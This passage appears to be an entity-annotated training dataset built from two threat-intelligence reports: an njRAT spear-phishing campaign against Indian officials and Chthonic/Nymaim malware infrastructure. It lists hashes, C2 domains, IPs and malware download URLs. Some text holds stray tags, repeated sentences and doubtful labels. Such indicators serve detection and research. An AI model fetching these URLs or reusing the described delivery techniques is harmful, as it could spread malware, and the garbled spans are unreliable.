"Organization"}, {"start": 139, "end": 144, "label": "System"}, {"start": 229, "end": 234, "label": "System"}, {"start": 258, "end": 272, "label": "Organization"}]} {"text": "The email was made to look like as if an investigation report related to Uri terror attack was shared by the MHA official .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 109, "end": 112, "label": "Organization"}]} {"text": "On Sept 20th,2016 similar Uri Terror report themed email was also sent to an email id connected with Indian embassy in Thailand .", "spans": [{"start": 51, "end": 56, "label": "System"}, {"start": 77, "end": 82, "label": "System"}, {"start": 101, "end": 115, "label": "Organization"}]} {"text": "This email was later forwarded on Oct 24th,2016 from a spoofed email id which is associated with Thailand Indian embassy to various email recipients connected to the Indian Ministry of External Affairs as shown in the below screen shot .", "spans": [{"start": 5, "end": 10, "label": "System"}, {"start": 63, "end": 68, "label": "System"}, {"start": 106, "end": 120, "label": "Organization"}, {"start": 132, "end": 137, "label": "System"}, {"start": 166, "end": 201, "label": "Organization"}]} {"text": "In this case Attackers again spoofed an email id associated with Indian Ministry of Home Affairs and the mail was sent on September 1,2016 to an email id associated Thailand Indian embassy , this email was later forwarded on Oct 24th,2016 from a spoofed email of Thailand Indian embassy to various email recipients connected to the Indian Ministry of External Affairs ( MEA ) .", "spans": [{"start": 40, "end": 45, "label": "System"}, {"start": 65, "end": 96, "label": "Organization"}, {"start": 145, "end": 150, "label": "System"}, {"start": 174, "end": 188, "label": "Organization"}, {"start": 196, "end": 201, "label": "System"}, {"start": 254, "end": 259, "label": "System"}, {"start": 272, "end": 286, "label": "Organization"}, {"start": 298, "end": 303, "label": "System"}, 
{"start": 332, "end": 367, "label": "Organization"}, {"start": 370, "end": 373, "label": "Organization"}]} {"text": "This time the email was made to look like an investigation report related to Jammu & Kashmir protest was shared by the Ministry of Home Affairs Official and the forwarded email was made to look like the report was forwarded by an Ambassador in Thailand Indian embassy to the MEA officials .", "spans": [{"start": 14, "end": 19, "label": "System"}, {"start": 119, "end": 143, "label": "Organization"}, {"start": 171, "end": 176, "label": "System"}, {"start": 253, "end": 267, "label": "Organization"}, {"start": 275, "end": 278, "label": "Organization"}]} {"text": "From the emails ( and the attachments ) it looks like the goal of the attackers was to infect and take control of the systems and also to spy on the actions of the Indian Government post the Jammu & Kashmir protest and Uri Terror attack .", "spans": [{"start": 9, "end": 15, "label": "System"}]} {"text": "When the victim opens the attached word document it prompts the user to enable macro content and both the documents ( Uri Terror Report.doc and mha-report.doc ) displayed the same content and contained a Show Document button .", "spans": [{"start": 26, "end": 48, "label": "System"}, {"start": 118, "end": 139, "label": "Indicator"}, {"start": 144, "end": 158, "label": "Indicator"}]} {"text": "In case of both the documents ( Uri Terror Report.doc and mha-report.doc ) the malicious macro code was heavily obfuscated (used obscure variable/function names to make analysis harder ) and did not contain any auto execute functions .", "spans": [{"start": 32, "end": 53, "label": "Indicator"}, {"start": 58, "end": 72, "label": "Indicator"}, {"start": 89, "end": 99, "label": "System"}]} {"text": "Malicious activity is trigged only on user interaction , attackers normally use this technique to bypass sandbox/automated analysis .", "spans": []} {"text": "Reverse engineering both the word documents ( Uri Terror 
Report.doc & mha-report.doc ) exhibited similar behaviour except the minor difference mentioned below .", "spans": [{"start": 46, "end": 67, "label": "Indicator"}, {"start": 70, "end": 84, "label": "Indicator"}]} {"text": "In case of mha-report.doc the malicious activity triggered only when the show document button was clicked , when this event occurs the macro code calls a subroutine CommandButton1_Click() which in turn calls a malicious obfuscated function ( Bulbaknopka() ) .", "spans": [{"start": 11, "end": 25, "label": "Indicator"}, {"start": 135, "end": 145, "label": "System"}, {"start": 165, "end": 187, "label": "System"}, {"start": 242, "end": 255, "label": "System"}]} {"text": "In case of Uri Terror Report.doc the malicious activity triggered when the document was either closed or when the show document button was clicked , when any of these event occurs a malicious obfuscated function ( chugnnarabashkoim() ) gets called .", "spans": [{"start": 11, "end": 32, "label": "Indicator"}, {"start": 214, "end": 233, "label": "System"}]} {"text": "The malicious macro code first decodes a string which contains a reference to the pastebin url .", "spans": [{"start": 4, "end": 24, "label": "System"}]} {"text": "The macro then decodes a PowerShell script which downloads base64 encoded content from the pastebin url .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 25, "end": 35, "label": "System"}, {"start": 59, "end": 81, "label": "System"}, {"start": 91, "end": 99, "label": "System"}]} {"text": "The base64 encoded content downloaded from the Pastebin link is then decoded to an executable and dropped on the system .", "spans": [{"start": 4, "end": 26, "label": "System"}, {"start": 47, "end": 55, "label": "System"}]} {"text": "The technique of hosting malicious code in legitimate sites like Pastebin has advantages and it is highly unlikely to trigger any suspicion in security monitoring and also can bypass reputation based devices .", "spans": [{"start": 
65, "end": 73, "label": "System"}]} {"text": "The dropped file was determined as modified version of njRAT trojan .", "spans": [{"start": 55, "end": 67, "label": "Malware"}]} {"text": "The dropped file ( officeupdate.exe ) is then executed by the macro code using the PowerShell script . njRAT is a Remote Access Tool ( RAT ) used mostly by the actor groups in the middle east .", "spans": [{"start": 19, "end": 35, "label": "Indicator"}, {"start": 62, "end": 72, "label": "System"}, {"start": 83, "end": 100, "label": "System"}, {"start": 103, "end": 108, "label": "Malware"}, {"start": 114, "end": 132, "label": "System"}, {"start": 135, "end": 138, "label": "Malware"}]} {"text": "Once infected njRAT communicates to the attacker and allows the attacker to log keystrokes , upload/download files , access victims web camera , audio recording , steal credentials , view victims desktop , open reverse shell etc .", "spans": [{"start": 14, "end": 19, "label": "Malware"}]} {"text": "The dropped file was analyzed in an isolated environment ( without actually allowing it to connect to the c2 server ) .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 106, "end": 108, "label": "System"}]} {"text": "Once the dropped file ( officeupdate.exe ) is executed the malware drops additional files ( googleupdate.exe , malib.dll and msccvs.dll ) into the %AllUsersProfile%\\Google directory and then executes the dropped googleupdate.exe Upon execution malware makes a connection to the c2 server on port 5555 and sends the system & operating system information along with some base64 encoded strings to the attacker as shown below .", "spans": [{"start": 24, "end": 40, "label": "Indicator"}, {"start": 55, "end": 66, "label": "Malware"}, {"start": 92, "end": 108, "label": "Indicator"}, {"start": 111, "end": 120, "label": "Indicator"}, {"start": 125, "end": 135, "label": "Indicator"}, {"start": 147, "end": 171, "label": "Organization"}, {"start": 212, "end": 228, "label": 
"Indicator"}, {"start": 244, "end": 251, "label": "Malware"}, {"start": 278, "end": 280, "label": "System"}]} {"text": "This section contains the details of the c2 domain ( khanji.ddns.net ) .", "spans": [{"start": 41, "end": 43, "label": "System"}, {"start": 53, "end": 68, "label": "Indicator"}]} {"text": "Attackers used the DynamicDNS to host the c2 server , this allows the attacker to quickly change the IP address in real time if the malware c2 server infrastructure is unavailable .", "spans": [{"start": 19, "end": 29, "label": "System"}, {"start": 42, "end": 44, "label": "System"}, {"start": 101, "end": 103, "label": "Indicator"}, {"start": 140, "end": 142, "label": "System"}]} {"text": "The c2 domain was associated with multiple IP addresses in past .", "spans": [{"start": 4, "end": 6, "label": "System"}, {"start": 43, "end": 45, "label": "Indicator"}]} {"text": "During the timeline of this cyber attack most of these IP addresses were located in Pakistan and few IP addresses used the hosting provider infrastructure .", "spans": [{"start": 55, "end": 57, "label": "Indicator"}, {"start": 101, "end": 103, "label": "Indicator"}, {"start": 123, "end": 154, "label": "System"}]} {"text": "The c2 domain ( khanji.ddns.net ) was also found to be associated with multiple malware samples in the past , Some of these malware samples made connection to pastebin urls upon execution , which is similar to the behavior mentioned previously .", "spans": [{"start": 4, "end": 6, "label": "System"}, {"start": 16, "end": 31, "label": "Indicator"}, {"start": 159, "end": 167, "label": "System"}]} {"text": "Based on the base64 encoded content posted in the Pastebin , userid associated with the Pastebin post was determined .", "spans": [{"start": 13, "end": 35, "label": "System"}, {"start": 50, "end": 58, "label": "System"}, {"start": 88, "end": 96, "label": "System"}]} {"text": "The same user posted multiple similar posts most of them containing similar base64 encoded content ( probably 
used by the malwares in other campaigns to decode and drop malware executable ) , these posts were made between July 21st , 2016 to September 30 , 2016 .", "spans": [{"start": 76, "end": 98, "label": "System"}]} {"text": "Below screen shot shows the posts made by the user , the hits column in the below screen shot gives an idea of number of times the links were visited ( probably by the malicious macro code ) , this can give rough idea of the number of users who are probably infected as a result of opening the malicious document .", "spans": [{"start": 168, "end": 188, "label": "System"}]} {"text": "Doing a Google search for the Pastebin userid landed me on a YouTube video posted by an individual demonstrating his modified version of njRAT control panel/builder kit .", "spans": [{"start": 8, "end": 14, "label": "Organization"}, {"start": 30, "end": 38, "label": "System"}, {"start": 61, "end": 68, "label": "Organization"}, {"start": 137, "end": 168, "label": "System"}]} {"text": "The Pastebin userid matched with the email ID mentioned by this individual in the YouTube video description section .", "spans": [{"start": 4, "end": 12, "label": "System"}, {"start": 37, "end": 42, "label": "System"}, {"start": 82, "end": 89, "label": "Organization"}]} {"text": "This same keyword was also found in the njRAT c2 communication used in this attack .", "spans": [{"start": 40, "end": 45, "label": "Malware"}, {"start": 46, "end": 48, "label": "System"}]} {"text": "After inspecting the njRAT builder kit it was determined that this individual customized the existing njRAT builder kit to bypass security products .", "spans": [{"start": 21, "end": 38, "label": "System"}, {"start": 102, "end": 119, "label": "System"}]} {"text": "The product information in the builder kit matched with this individual \u2019s YouTube username and the YouTube channel .", "spans": [{"start": 75, "end": 82, "label": "Organization"}, {"start": 100, "end": 107, "label": "Organization"}]} {"text": "The njRAT 
used in this cyber attack was built from this builder kit .", "spans": [{"start": 4, "end": 9, "label": "Malware"}]} {"text": "Based on this information it can be concluded that espionage actors used this individual \u2019s modified version of njRAT in this cyber attack .", "spans": [{"start": 112, "end": 117, "label": "Malware"}]} {"text": "Even though this individual \u2019s email id matched with the Pastebin id where base64 encoded malicious code was found , it is hard to say if this individual was or was not involved in this cyber attack .", "spans": [{"start": 31, "end": 36, "label": "System"}, {"start": 57, "end": 65, "label": "System"}]} {"text": "It could be possible that the espionage actors used his public identity as a diversion to mislead and to hide the real identity of the attackers or it is also possible that this individual was hired to carry out the attack .", "spans": []} {"text": "The indicators are provided below , these indicators can be used by the organizations ( Government , Public and Private organizations ) to detect and investigate this attack campaign . 14b9d54f07f3facf1240c5ba89aa2410 ( googleupdate.exe ) . 2b0bd7e43c1f98f9db804011a54c11d6 ( malib.dll ) . feec4b571756e8c015c884cb5441166b ( msccvs.dll ) . 84d9d0524e14d9ab5f88bbce6d2d2582 ( officeupdate.exe ) . khanji.ddns.net 139.190.6.180 39.40.141.25 175.110.165.110 39.40.44.245 39.40.67.219 . http://pastebin.com/raw/5j4hc8gT http://pastebin.com/raw/6bwniBtB . 
028caf3b1f5174ae092ecf435c1fccc2 7732d5349a0cfa1c3e4bcfa0c06949e4 9909f8558209449348a817f297429a48 63698ddbdff5be7d5a7ba7f31d0d592c 7c4e60685203b229a41ae65eba1a0e10 e2112439121f8ba9164668f54ca1c6af .", "spans": [{"start": 185, "end": 217, "label": "Indicator"}, {"start": 220, "end": 236, "label": "Indicator"}, {"start": 241, "end": 273, "label": "Indicator"}, {"start": 276, "end": 285, "label": "Indicator"}, {"start": 290, "end": 322, "label": "Indicator"}, {"start": 325, "end": 335, "label": "Indicator"}, {"start": 340, "end": 372, "label": "Indicator"}, {"start": 375, "end": 391, "label": "Indicator"}, {"start": 396, "end": 411, "label": "Indicator"}, {"start": 412, "end": 425, "label": "Indicator"}, {"start": 426, "end": 438, "label": "Indicator"}, {"start": 439, "end": 454, "label": "Indicator"}, {"start": 455, "end": 467, "label": "Indicator"}, {"start": 468, "end": 480, "label": "Indicator"}, {"start": 483, "end": 515, "label": "Indicator"}, {"start": 516, "end": 548, "label": "Indicator"}, {"start": 551, "end": 583, "label": "Indicator"}, {"start": 584, "end": 616, "label": "Indicator"}, {"start": 617, "end": 649, "label": "Indicator"}, {"start": 650, "end": 682, "label": "Indicator"}, {"start": 683, "end": 715, "label": "Indicator"}, {"start": 716, "end": 748, "label": "Indicator"}]} {"text": "Attackers in this case made every attempt to launch a clever attack campaign by spoofing legitimate email ids and using an email theme relevant to the targets .", "spans": [{"start": 100, "end": 105, "label": "System"}, {"start": 123, "end": 128, "label": "System"}]} {"text": "The following factors in this cyber attack suggests the possible involvement of Pakistan state sponsored cyber espionage group to mainly spy on India \u2019s actions related to these Geo-political events ( Uri terror attack and Jammu & Kashmir protests ) .", "spans": []} {"text": "Victims/targets chosen ( Indian Embassy and Indian MEA officals ) .", "spans": [{"start": 25, "end": 39, "label": 
"Organization"}, {"start": 44, "end": 54, "label": "Organization"}]} {"text": "Use of email theme related to the Geo-political events that is of interest to the targets .", "spans": [{"start": 7, "end": 12, "label": "System"}]} {"text": "Timing of the spear phishing emails sent to the victims .", "spans": [{"start": 29, "end": 35, "label": "System"}]} {"text": "Location of the c2 infrastructure .", "spans": [{"start": 16, "end": 18, "label": "System"}]} {"text": "Use of malware that is capable of spying on infected systems .", "spans": []} {"text": "The following factors show the level of sophistication and reveals the attackers intention to remain stealthy and to gain long-term access by evading anti-virus , sandbox and security monitoring at both the desktop and network levels .", "spans": []} {"text": "Use of obfuscated malicious macro code .", "spans": [{"start": 18, "end": 38, "label": "System"}]} {"text": "Use of macro code that triggers only on user intervention ( to bypass sandbox analysis ) .", "spans": [{"start": 7, "end": 17, "label": "System"}]} {"text": "Use of legitimate site ( Pastebin ) to host malicious code ( to bypass security monitoring ) .", "spans": [{"start": 25, "end": 33, "label": "System"}]} {"text": "Use of customized njRAT ( capable of evading anti-virus ) .", "spans": [{"start": 18, "end": 23, "label": "Malware"}]} {"text": "The Curious Case of Notepad and Chthonic : Exposing a Malicious Infrastructure .", "spans": [{"start": 20, "end": 27, "label": "System"}, {"start": 32, "end": 40, "label": "Malware"}]} {"text": "Recently , I \u2019ve been investigating malware utilizing PowerShell and have spent a considerable amount of time refining ways to identify new variants of attacks as they appear .", "spans": [{"start": 54, "end": 64, "label": "System"}]} {"text": "This posting is a follow-up of my previous work on this subject in", "spans": []} {"text": "\u201c Pulling Back the Curtains on EncodedCommand PowerShell Attacks \u201d .", 
"spans": [{"start": 46, "end": 56, "label": "System"}]} {"text": "In a sample I recently analyzed , something stood out as extremely suspicious which led me down a rabbit hole , uncovering malicious infrastructure supporting Chthonic , Nymaim , and other malware and malicious websites .", "spans": [{"start": 159, "end": 167, "label": "Malware"}, {"start": 170, "end": 176, "label": "Malware"}]} {"text": "Throughout this blog post I present my analysis and thought process during this research , but if you would just like a list of the findings , they are over on our Unit42 GitHub .", "spans": [{"start": 164, "end": 170, "label": "Organization"}, {"start": 171, "end": 177, "label": "System"}]} {"text": "Most commonly , PowerShell is launched from a Microsoft Office document that uses a VBA macro to launch PowerShell to perform something malicious \u2013 typically downloading the \u201c real \u201d malware to run .", "spans": [{"start": 16, "end": 26, "label": "System"}, {"start": 46, "end": 71, "label": "System"}, {"start": 84, "end": 93, "label": "System"}, {"start": 104, "end": 114, "label": "System"}]} {"text": "I focused my hunting on the PowerShell activity with Palo Alto Networks AutoFocus to determine whether it \u2019s worth digging into further based on \u201c uniqueness \u201d and functionality .", "spans": [{"start": 28, "end": 38, "label": "System"}]} {"text": "In this case , the first sample I looked at stood out for another reason entirely .", "spans": []} {"text": "If you take a look at the below PowerShell , you \u2019ll quickly understand why .", "spans": [{"start": 32, "end": 42, "label": "System"}]} {"text": "Most commonly , PowerShell is launched from a Microsoft Office document that uses a VBA macro to launch PowerShell to perform something malicious \u2013 typically downloading the \u201c real \u201d malware to run .", "spans": [{"start": 16, "end": 26, "label": "System"}, {"start": 46, "end": 71, "label": "System"}, {"start": 84, "end": 93, 
"label": "System"}, {"start": 104, "end": 114, "label": "System"}]} {"text": "I focused my hunting on the PowerShell activity with Palo Alto Networks AutoFocus to determine whether it \u2019s worth digging into further based on \u201c uniqueness \u201d and functionality .", "spans": [{"start": 28, "end": 38, "label": "System"}]} {"text": "My initial thought was the worst-case scenario \u2013 they \u2019ve been compromised and are distributing malware ! I immediately downloaded the file from the website , but everything looked normal .", "spans": []} {"text": "Of course , I had to investigate further .", "spans": []} {"text": "Looking under the hood we see the VBA code that builds the PowerShell B-FILE S-TOOL command and launches it but something seemed off .", "spans": [{"start": 34, "end": 37, "label": "System"}]} {"text": "There are a ton of functions that are clearly decoding information from arrays after which it executes an already decoded PowerShell command .", "spans": [{"start": 122, "end": 132, "label": "System"}]} {"text": "I decided to debug the macro and see exactly what it \u2019s doing before I made any decisions .", "spans": []} {"text": "The most likely conclusion that can be drawn here is that an analyst or researcher obtained this file , modified it to see the content ( misspelling the variable name along the way ) post-decoding , and uploaded it to see what it did in a sandbox .", "spans": []} {"text": "To be sure though , I needed to find other samples and see how they stacked up against this one .", "spans": []} {"text": "Going back to the PowerShell command , the initial reason I stopped to look at it was due to the way they concatenated variables to form the download command and output .", "spans": [{"start": 18, "end": 28, "label": "System"}]} {"text": "This also provides a perfect pivot point to hunt for samples .", "spans": [{"start": 29, "end": 40, "label": "System"}]} {"text": "The dates were all fairly recent , having been received in 
the past few days since the beginning of August .", "spans": []} {"text": "The documents shared the same themes for lures but the VBA macro and resulting PowerShell were more along the lines of what I expected .", "spans": [{"start": 55, "end": 64, "label": "System"}, {"start": 79, "end": 89, "label": "System"}]} {"text": "For sample \u201c 538ff577a80748d87b5e738e95c8edd2bd54ea406fe3a75bf452714b17528a87 \u201d the following is an excerpt from the VBA macro building the PowerShell command .", "spans": [{"start": 13, "end": 77, "label": "Indicator"}, {"start": 117, "end": 126, "label": "System"}, {"start": 140, "end": 150, "label": "System"}]} {"text": "Along with the subsequent Process Activity using the newly built PowerShell command , which aligns with what was commented out of the first sample analyzed .", "spans": [{"start": 65, "end": 75, "label": "System"}]} {"text": "Given this , I iterated over all 171 samples and extracted the following URL \u2019s where PowerShell is downloading a payload :", "spans": [{"start": 86, "end": 96, "label": "System"}]} {"text": "http://ditetec.com S-DOM/ts.exe http://ditetec.com S-DOM/u2.exe http://domass.com.ua S-DOM/index.gif http://firop.com S-DOM/ego.exe http://unoset.com S-DOM/jpx.exe http://unoset.com S-DOM/sxr.exe https://doci.download S-DOM/inc.exe https://farhenzel.co S-DOM/gls.exe https://farsonka.co S-DOM/trb.exe https://formsonat.co S-DOM/mrb.exe https://fortuma.co S-DOM/scu.exe https://iilliiill.bid S-DOM/6ven.exe https://iilliiill.bid S-DOM/ven.exe https://iilliiill.bid S-DOM/ven.tvv https://lom.party S-DOM/mov.exe https://naiillad.date S-DOM/ex3.exe https://naiillad.date S-DOM/u3.exe https://naiillad.date S-DOM/vmer.exe https://naiillad.date S-DOM/vsync.exe https://notepad-plus-plus.org/repository S-DOM/7.x/7.4.2/npp.7.4.2.Installer.exe https://prof.cricket S-DOM/wp.exe https://tvavi.win S-DOM/pago.exe .", "spans": [{"start": 0, "end": 31, "label": "Indicator"}, {"start": 32, "end": 63, "label": "Indicator"}, 
{"start": 64, "end": 100, "label": "Indicator"}, {"start": 101, "end": 131, "label": "Indicator"}, {"start": 132, "end": 163, "label": "Indicator"}, {"start": 164, "end": 195, "label": "Indicator"}, {"start": 196, "end": 231, "label": "Indicator"}, {"start": 232, "end": 266, "label": "Indicator"}, {"start": 267, "end": 300, "label": "Indicator"}, {"start": 301, "end": 335, "label": "Indicator"}, {"start": 336, "end": 368, "label": "Indicator"}, {"start": 369, "end": 405, "label": "Indicator"}, {"start": 406, "end": 441, "label": "Indicator"}, {"start": 442, "end": 477, "label": "Indicator"}, {"start": 478, "end": 509, "label": "Indicator"}, {"start": 510, "end": 545, "label": "Indicator"}, {"start": 546, "end": 580, "label": "Indicator"}, {"start": 581, "end": 617, "label": "Indicator"}, {"start": 618, "end": 655, "label": "Indicator"}, {"start": 656, "end": 736, "label": "Indicator"}, {"start": 737, "end": 770, "label": "Indicator"}, {"start": 771, "end": 803, "label": "Indicator"}]} {"text": "After iterating over the 171 samples , we \u2019re left with this list of hashes for the downloaded files .", "spans": []} {"text": "Note that there are fewer payloads than there are samples , indicating many of the documents download the same payload .", "spans": []} {"text": "Below is a table with the compile date and some PDB strings found within a few of the binaries .", "spans": []} {"text": "Most of the compile times are within the past two months , with 6 in August and a couple from as recently as two days ago at the time of this writing . 29c7740f487a461a96fad1c8db3921ccca8cc3e7548d44016da64cf402a475ad 2016-12-10 01 . d5e56b9b5f52293b209a60c2ccd0ade6c883f9d3ec09571a336a3a4d4c79134b 2016-12-10 03 C:\\RAMDrive\\Charles\\heaven\\reams\\Teac.pdb . dd5f237153856d19cf20e80ff8238ca42047113c44fae27b5c3ad00be2755eea 2016-12-10 16 C:\\Cleaner\\amuse\\rang\\AutoPopulate\\la.pdb . a5001e9b29078f532b1a094c8c16226d20c03922e37a4fca2e9172350bc160a0 2016-12-20 18 . 
8284ec768a06b606044defe2c2da708ca6b3b51f8e58cb66f61bfca56157bc88 2017-07-05 10 . f0ce51eb0e6c33fdb8e1ccb36b9f42139c1dfc58d243195aedc869c7551a5f89 2017-07-09 20 C:\\TableAdapter\\encyclopedia\\Parik.pdb . 145d47f4c79206c6c9f74b0ab76c33ad0fd40ac6724b4fac6f06afec47b307c6 2017-07-10 08 C:\\ayakhnin\\reprductive\\distortedc.pdb . dc8f34829d5fede991b478cf9117fb18c32d639573a827227b2fc50f0b475085 2017-07-11 01 C:\\positioning\\scrapping\\Szets\\thi.pdb . 7fe1069c118611113b4e34685e7ee58cb469bda4aa66a22db10842c95f332c77 2017-07-11 02 C:\\NeXT\\volatile\\legacyExchangeDNs.pdb . 5edf117e7f8cd176b1efd0b5fd40c6cd530699e7a280c5c7113d06e9c21d6976 2017-07-12 23 . 2a80fdda87127bdc56fd35c3e04eb64a01a159b7b574177e2e346439c97b770a 2017-07-13 00. a9021e253ae52122cbcc2284b88270ceda8ad9647515d6cca96db264a76583f5 2017-07-18 00 . dd639d76ff6f33bbfaf3bd398056cf4e95e27822bd9476340c7703f5b38e0183 2017-07-18 00 . e5a00b49d4ab3e5a3a8f60278b9295f3d252e3e04dadec2624bb4dcb2eb0fada 2017-07-24 17 . 6263730ef54fbed0c2d3a7c6106b6e8b12a6b2855a03e7caa8fb184ed1eabeb2 2017-07-24 22 C:\\Snapshot\\Diskette\\hiding\\ROCKMA.pdb . 43bfaf9a2a4d46695bb313a32d88586c510d040844f29852c755845a5a09d9df 2017-07-25 06 . b41660db6dcb0d3c7b17f98eae3141924c8c0ee980501ce541b42dc766f85628 2017-07-25 06 C:\\mdb\\Changed\\Container\\praise.pdb . 9acdad02ca8ded6043ab52b4a7fb2baac3a08c9f978ce9da2eb51c816a9e7a2e 2017-07-25 07 . 2ddaa30ba3c3e625e21eb7ce7b93671ad53326ef8b6e2bc20bc0d2de72a3929d 2017-07-25 20 C:\\helpers\\better\\Expr\\Eight\\DS.pdb . b836576877b2fcb3cacec370e5e6a029431f59d5070da89d94200619641ca0c4 2017-07-26 12 C:\\V\\regard\\violates\\update\\AMBW\\a.pdb . 0972fc9602b00595e1022d9cfe7e9c9530d4e9adb5786fea830324b3f7ff4448 2017-07-26 20 . 2c258ac862d5e31d8921b64cfa7e5a9cd95cca5643c9d51db4c2fcbe75fa957a 2017-07-27 01 C:\\executablery\\constructed\\IIc.pdb . dd9c558ba58ac81a2142ecb308ac8d0f044c7059a039d2e367024d953cd14a00 2017-07-27 02 . 
cb3173a820ac392005de650bbd1dd24543a91e72d4d56300a7795e887a8323b2 2017-07-31 14 C:\\letterbxing\\EVP\\Chices\\legit.pdb . a636f49814ea6603534f780b83a5d0388f5a5d0eb848901e1e1bf2d19dd84f05 2017-07-31 18 C:\\Biomuse\\moment\\705\\cnvincing.pdb . 677dd11912a0f13311d025f88caabeeeb1bda27c7c1b5c78cffca36de46e8560 2017-07-31 21 . fdedf0f90d42d3779b07951d1e8826c7015b3f3e724ab89e350c9608e1f23852 2017-08-01 21 . 142bf7f47bfbd592583fbcfa22a25462df13da46451b17bb984d50ade68a5b17 2017-08-02 09 . 6f4b2c95b1a0f320da1b1eaa918c338c0bab5cddabe169f12ee734243ed8bba8 2017-08-02 12 C:\\cataloging\\Dr\\VarianceShadows11.pdb . fd5fd7058cf157ea249d4dcba71331f0041b7cf8fd635f37ad13aed1b06bebf2 2017-08-04 02 C:\\dumplings\\That\\BIT\\Warez\\loc.pdb . 5785c2d68d6f669b96c3f31065f0d9804d2ab1f333a90d225bd993e66656b7d9 2017-08-07 12 C:\\Lgisys\\hypothesized\\donatedc.pdb . 675719a9366386034c285e99bf33a1a8bafc7644874b758f307d9a288e95bdbd 2017-08-07 17 C:\\work\\cr\\nata\\cpp\\seven\\seven\\release\\seven.pdb .", "spans": [{"start": 152, "end": 216, "label": "Indicator"}, {"start": 233, "end": 297, "label": "Indicator"}, {"start": 356, "end": 420, "label": "Indicator"}, {"start": 479, "end": 543, "label": "Indicator"}, {"start": 560, "end": 624, "label": "Indicator"}, {"start": 641, "end": 705, "label": "Indicator"}, {"start": 761, "end": 825, "label": "Indicator"}, {"start": 881, "end": 945, "label": "Indicator"}, {"start": 1001, "end": 1065, "label": "Indicator"}, {"start": 1121, "end": 1185, "label": "Indicator"}, {"start": 1202, "end": 1266, "label": "Indicator"}, {"start": 1282, "end": 1346, "label": "Indicator"}, {"start": 1363, "end": 1427, "label": "Indicator"}, {"start": 1444, "end": 1508, "label": "Indicator"}, {"start": 1525, "end": 1589, "label": "Indicator"}, {"start": 1645, "end": 1709, "label": "Indicator"}, {"start": 1726, "end": 1790, "label": "Indicator"}, {"start": 1843, "end": 1907, "label": "Indicator"}, {"start": 1924, "end": 1988, "label": "Indicator"}, {"start": 2041, "end": 
2105, "label": "Indicator"}, {"start": 2161, "end": 2225, "label": "Indicator"}, {"start": 2242, "end": 2306, "label": "Indicator"}, {"start": 2359, "end": 2423, "label": "Indicator"}, {"start": 2440, "end": 2504, "label": "Indicator"}, {"start": 2557, "end": 2621, "label": "Indicator"}, {"start": 2674, "end": 2738, "label": "Indicator"}, {"start": 2755, "end": 2819, "label": "Indicator"}, {"start": 2836, "end": 2900, "label": "Indicator"}, {"start": 2917, "end": 2981, "label": "Indicator"}, {"start": 3037, "end": 3101, "label": "Indicator"}, {"start": 3154, "end": 3218, "label": "Indicator"}, {"start": 3271, "end": 3335, "label": "Indicator"}]} {"text": "At least one of the binaries compiled in August had a PDB string I was able to locate online in a collection of other PDB files , so they may be introducing their malicious code into these files before compiling someone else \u2019s project .", "spans": []} {"text": "Once the file has been downloaded and executed , the new process will launch a legitimate executable , such as \u201c msiexec.exe \u201d , and inject code into it .", "spans": [{"start": 113, "end": 124, "label": "Indicator"}]} {"text": "This code will then download further payloads through a POST request to various websites .", "spans": [{"start": 56, "end": 60, "label": "Indicator"}]} {"text": "This pattern is shared across the original samples .", "spans": []} {"text": "These HTTP requests match known patterns for a banking Trojan named Chthonic , which is a variant of Zeus .", "spans": [{"start": 6, "end": 10, "label": "Indicator"}, {"start": 47, "end": 61, "label": "Malware"}, {"start": 68, "end": 76, "label": "Malware"}]} {"text": "A good write-up from 2014 on the malware can be found in this writeup from Yury Namestnikov , Vladimir Kuskov , Oleg Kupreev at Kaspersky Lab here and indicates that the returned data is an RC4 encrypted loader that sets-up the main Chthonic module which can download additional modules or malware .", "spans": 
[{"start": 233, "end": 241, "label": "Malware"}]} {"text": "Iterating once again over the 171 samples and scraping out the HTTP POST requests , I ended up with the below set of domains :", "spans": [{"start": 63, "end": 67, "label": "Indicator"}, {"start": 68, "end": 72, "label": "Indicator"}]} {"text": "amellet.bit danrnysvp.com ejtmjealr.com firop.com gefinsioje.com gesofgamd.com ponedobla.bit unoset.com .", "spans": [{"start": 0, "end": 11, "label": "Indicator"}, {"start": 12, "end": 25, "label": "Indicator"}, {"start": 26, "end": 39, "label": "Indicator"}, {"start": 40, "end": 49, "label": "Indicator"}, {"start": 50, "end": 64, "label": "Indicator"}, {"start": 65, "end": 78, "label": "Indicator"}, {"start": 79, "end": 92, "label": "Indicator"}, {"start": 93, "end": 103, "label": "Indicator"}]} {"text": "Using this as the next pivot , we have 6,034 unique samples that get returned in AutoFocus having made POST requests to these sites .", "spans": [{"start": 103, "end": 107, "label": "Indicator"}]} {"text": "Additionally , we can see there were at least 3 very large campaigns where Palo Alto Networks saw activity to these sites in July .", "spans": []} {"text": "From these distribution sites , we can see that 5,520 samples are making HTTP requests to them and these samples have been identified as another downloader Trojan named Nymaim .", "spans": [{"start": 73, "end": 77, "label": "Indicator"}, {"start": 156, "end": 162, "label": "Malware"}, {"start": 169, "end": 175, "label": "Malware"}]} {"text": "The majority of the overall samples came from the following four sites :", "spans": []} {"text": "ejtmjealr.com gefinsioje.com gesofgamd.com ponedobla.bit .", "spans": [{"start": 0, "end": 13, "label": "Indicator"}, {"start": 14, "end": 28, "label": "Indicator"}, {"start": 29, "end": 42, "label": "Indicator"}, {"start": 43, "end": 56, "label": "Indicator"}]} {"text": "The \u2018 ejtmjealr.com \u2019 domain is particularly interesting due to a similar domain , \u2018 
ejdqzkd.com \u2019 being discussed by Jaros\u0142aw Jedynak of CERT.PL in this analysis of Nymaim from earlier in the year .", "spans": [{"start": 6, "end": 19, "label": "Indicator"}, {"start": 85, "end": 96, "label": "Indicator"}, {"start": 138, "end": 145, "label": "Organization"}, {"start": 166, "end": 172, "label": "Malware"}]} {"text": "They go on to discuss how Nymaim uses a static configuration to contact that domain , which will return IP \u2019s that go into a DGA and output the actual IP addresses needed for C2 communication .", "spans": [{"start": 26, "end": 32, "label": "Malware"}, {"start": 175, "end": 177, "label": "System"}]} {"text": "Ben Baker , Edmund Brumaghin and Jonah Samost of Talos have a fantastic write-up of this process here .", "spans": [{"start": 49, "end": 54, "label": "Organization"}]} {"text": "To continue my analysis , I shifted focus to Maltego so as to visually graph the infrastructure .", "spans": [{"start": 45, "end": 52, "label": "System"}]} {"text": "For this task , I used PassiveTotal \u2019s Passive DNS and AutoFocus Maltego transforms .", "spans": [{"start": 23, "end": 50, "label": "System"}, {"start": 55, "end": 83, "label": "System"}]} {"text": 